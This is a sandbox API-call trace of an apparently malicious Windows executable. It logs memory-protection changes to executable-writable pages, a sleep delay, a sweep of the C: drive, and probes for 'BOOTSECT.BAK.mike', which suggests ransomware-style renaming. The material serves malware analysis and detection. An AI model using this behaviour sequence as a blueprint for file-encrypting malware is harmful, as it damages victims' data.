# Flog Txt Version 1 # Analyzer Version: 3.1.1 # Analyzer Build Date: Sep 16 2019 10:43:25 # Log Creation Date: 04.10.2019 07:39:05.985 Process: id = "1" image_name = "34gfwhqjjgtuiudu.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\34gfwhqjjgtuiudu.exe" page_root = "0x4e0be000" os_pid = "0x8dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\34gfwhqjjgtuiudu.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x8e0 [0029.139] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0029.268] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\34gfwhqjjgtuiudu.exe", nBufferLength=0x105, lpBuffer=0x2ae5bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\34gfwhqjjgtuiudu.exe", lpFilePart=0x0) returned 0x3a [0029.275] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\34gfwhqjjgtuiudu.exe", nBufferLength=0x105, lpBuffer=0x2ae534, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\34gfwhqjjgtuiudu.exe", lpFilePart=0x0) returned 0x3a [0029.292] VirtualProtect (in: lpAddress=0x122000, dwSize=0xb0a8, flNewProtect=0x40, lpflOldProtect=0x2aeb24 | out: lpflOldProtect=0x2aeb24*=0x80) returned 1 [0030.062] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\34gfwhqjjgtuiudu.exe", nBufferLength=0x105, lpBuffer=0x2ae490, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\34gfwhqjjgtuiudu.exe", lpFilePart=0x0) returned 0x3a [0030.062] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\34gfwhqjjgtuiudu.exe", nBufferLength=0x105, lpBuffer=0x2ae408, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\34gfwhqjjgtuiudu.exe", lpFilePart=0x0) returned 0x3a [0030.071] VirtualProtect (in: lpAddress=0x12e8ce, dwSize=0xb, flNewProtect=0x40, lpflOldProtect=0x2aeb6c | out: lpflOldProtect=0x2aeb6c*=0x20) returned 1 [0030.074] VirtualProtect (in: lpAddress=0x12e8c2, dwSize=0xb, flNewProtect=0x40, lpflOldProtect=0x2aeb6c | out: lpflOldProtect=0x2aeb6c*=0x40) returned 1 [0030.074] VirtualProtect (in: lpAddress=0x120178, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x2aeb6c | out: lpflOldProtect=0x2aeb6c*=0x2) returned 1 [0030.077] VirtualProtect (in: lpAddress=0x1201a0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x2aeb6c | out: lpflOldProtect=0x2aeb6c*=0x40) returned 1 [0030.078] VirtualProtect (in: lpAddress=0x1201c8, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x2aeb6c | out: lpflOldProtect=0x2aeb6c*=0x40) returned 1 [0030.078] VirtualProtect (in: lpAddress=0x1201f0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x2aeb6c | out: lpflOldProtect=0x2aeb6c*=0x40) returned 1 [0030.078] VirtualProtect (in: lpAddress=0x120218, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x2aeb6c | out: lpflOldProtect=0x2aeb6c*=0x40) returned 1 [0030.078] VirtualProtect (in: lpAddress=0x12e000, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x2aeb6c | out: lpflOldProtect=0x2aeb6c*=0x40) returned 1 [0030.078] VirtualProtect (in: lpAddress=0x12e8dc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x2aeb6c | out: lpflOldProtect=0x2aeb6c*=0x40) returned 1 [0030.079] VirtualProtect (in: lpAddress=0x12e8fc, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x2aeb6c | out: lpflOldProtect=0x2aeb6c*=0x40) returned 1 [0030.079] VirtualProtect (in: lpAddress=0x12e904, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x2aeb6c | out: lpflOldProtect=0x2aeb6c*=0x40) returned 1 [0030.079] VirtualProtect (in: lpAddress=0x12e908, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x2aeb6c | out: lpflOldProtect=0x2aeb6c*=0x40) returned 1 [0030.080] VirtualProtect (in: lpAddress=0x12e910, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x2aeb6c | out: lpflOldProtect=0x2aeb6c*=0x40) returned 1 [0030.080] VirtualProtect (in: lpAddress=0x12e914, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x2aeb6c | out: lpflOldProtect=0x2aeb6c*=0x40) returned 1 [0030.080] VirtualProtect (in: lpAddress=0x12e918, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x2aeb6c | out: lpflOldProtect=0x2aeb6c*=0x40) returned 1 [0030.080] VirtualProtect (in: lpAddress=0x12e91c, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x2aeb6c | out: lpflOldProtect=0x2aeb6c*=0x40) returned 1 [0030.081] VirtualProtect (in: lpAddress=0x12e924, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x2aeb6c | out: lpflOldProtect=0x2aeb6c*=0x40) returned 1 [0030.081] VirtualProtect (in: lpAddress=0x12e928, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x2aeb6c | out: lpflOldProtect=0x2aeb6c*=0x40) returned 1 [0030.081] VirtualProtect (in: lpAddress=0x12e930, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x2aeb6c | out: lpflOldProtect=0x2aeb6c*=0x40) returned 1 [0030.081] VirtualProtect (in: lpAddress=0x12e934, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x2aeb6c | out: lpflOldProtect=0x2aeb6c*=0x40) returned 1 [0030.082] VirtualProtect (in: lpAddress=0x12e938, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x2aeb6c | out: lpflOldProtect=0x2aeb6c*=0x40) returned 1 [0030.082] VirtualProtect (in: lpAddress=0x12e940, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x2aeb6c | out: lpflOldProtect=0x2aeb6c*=0x40) returned 1 [0030.082] VirtualProtect (in: lpAddress=0x12e944, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x2aeb6c | out: lpflOldProtect=0x2aeb6c*=0x40) returned 1 [0030.186] GetEnvironmentVariableW (in: lpName="COR_ENABLE_PROFILING", lpBuffer=0x2ae5dc, nSize=0x80 | out: lpBuffer="ỗ꠨뮜父*㋄瑆￿￿*륔球礐爵⫬牫疽珱᮫꠨礐爵⫬牫\x02") returned 0x0 [0030.329] SleepEx (dwMilliseconds=0x1388, bAlertable=1) returned 0x0 [0037.984] GetLogicalDrives () returned 0x4 [0037.998] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aedfc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0037.998] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af310) returned 1 [0037.998] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x2af38c | out: lpFileInformation=0x2af38c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0037.998] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af30c) returned 1 [0038.151] CoTaskMemAlloc (cb=0x20c) returned 0x55e920 [0038.151] GetSystemDirectoryW (in: lpBuffer=0x55e920, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0038.151] CoTaskMemFree (pv=0x55e920) [0038.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aedd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0038.151] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x2aee44, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0038.160] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af30c) returned 1 [0038.161] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x2aee14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0038.161] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x2aede8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0038.223] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x2af034 | out: lpFindFileData=0x2af034*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x4d0ba0 [0038.224] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2af044 | out: lpFindFileData=0x2af044*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0038.225] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2af044 | out: lpFindFileData=0x2af044*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0038.225] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2af044 | out: lpFindFileData=0x2af044*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0038.225] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2af044 | out: lpFindFileData=0x2af044*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0038.225] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2af044 | out: lpFindFileData=0x2af044*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0038.225] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2af044 | out: lpFindFileData=0x2af044*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x813b7be0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0038.225] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2af044 | out: lpFindFileData=0x2af044*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0038.226] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2af044 | out: lpFindFileData=0x2af044*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x814762c0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0038.226] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2af044 | out: lpFindFileData=0x2af044*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0038.226] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2af044 | out: lpFindFileData=0x2af044*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xd7569640, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xd7569640, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0038.226] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2af044 | out: lpFindFileData=0x2af044*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0038.226] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2af044 | out: lpFindFileData=0x2af044*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0038.226] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2af044 | out: lpFindFileData=0x2af044*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0038.226] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2af044 | out: lpFindFileData=0x2af044*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0038.227] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2af044 | out: lpFindFileData=0x2af044*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0038.227] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2af044 | out: lpFindFileData=0x2af044*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0038.227] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2af044 | out: lpFindFileData=0x2af044*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0038.227] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0038.227] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af2cc) returned 1 [0038.227] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af2d8) returned 1 [0038.227] GetFullPathNameW (in: lpFileName="C:\\bootmgr", nBufferLength=0x105, lpBuffer=0x2aedcc, lpFilePart=0x0 | out: lpBuffer="C:\\bootmgr", lpFilePart=0x0) returned 0xa [0038.247] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x2aedcc, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0038.247] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x2aedcc, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0038.256] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x2aed48, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0038.256] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af23c) returned 1 [0038.256] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0038.376] EtwEventRegister () returned 0x0 [0038.635] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ae078) returned 1 [0038.635] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0038.635] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af174) returned 1 [0038.635] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0038.635] GetFileType (hFile=0x264) returned 0x1 [0038.635] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0038.635] GetFileType (hFile=0x264) returned 0x1 [0038.635] CloseHandle (hObject=0x264) returned 1 [0038.635] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x2aedcc, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0038.734] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x2aedf4, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0038.734] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aed7c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0038.734] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af2d0) returned 1 [0038.734] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af2fc, lpTotalNumberOfBytes=0x2af2f4, lpTotalNumberOfFreeBytes=0x2af2ec | out: lpFreeBytesAvailableToCaller=0x2af2fc, lpTotalNumberOfBytes=0x2af2f4, lpTotalNumberOfFreeBytes=0x2af2ec) returned 1 [0038.734] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af2cc) returned 1 [0038.734] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af2a0) returned 1 [0038.734] GetFileAttributesExW (in: lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), fInfoLevelId=0x0, lpFileInformation=0x20f235c | out: lpFileInformation=0x20f235c*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0038.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af29c) returned 1 [0038.735] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x2aedf4, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0038.735] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af2a0) returned 1 [0038.735] GetFileAttributesExW (in: lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), fInfoLevelId=0x0, lpFileInformation=0x20f2598 | out: lpFileInformation=0x20f2598*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0038.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af29c) returned 1 [0038.735] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x2aedd4, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0038.735] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK.mike", nBufferLength=0x105, lpBuffer=0x2aedf8, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK.mike", lpFilePart=0x0) returned 0x14 [0038.735] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af258) returned 1 [0038.735] GetFileAttributesExW (in: lpFileName="C:\\BOOTSECT.BAK.mike" (normalized: "c:\\bootsect.bak.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af2d4 | out: lpFileInformation=0x2af2d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0038.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af254) returned 1 [0038.743] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x2aedd8, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0038.743] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x2aedd0, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0038.807] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x2aed5c, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0038.807] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK.mike", nBufferLength=0x105, lpBuffer=0x2aed60, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK.mike", lpFilePart=0x0) returned 0x14 [0038.807] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c0) returned 1 [0038.807] GetFileAttributesExW (in: lpFileName="C:\\BOOTSECT.BAK.mike" (normalized: "c:\\bootsect.bak.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af23c | out: lpFileInformation=0x2af23c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, 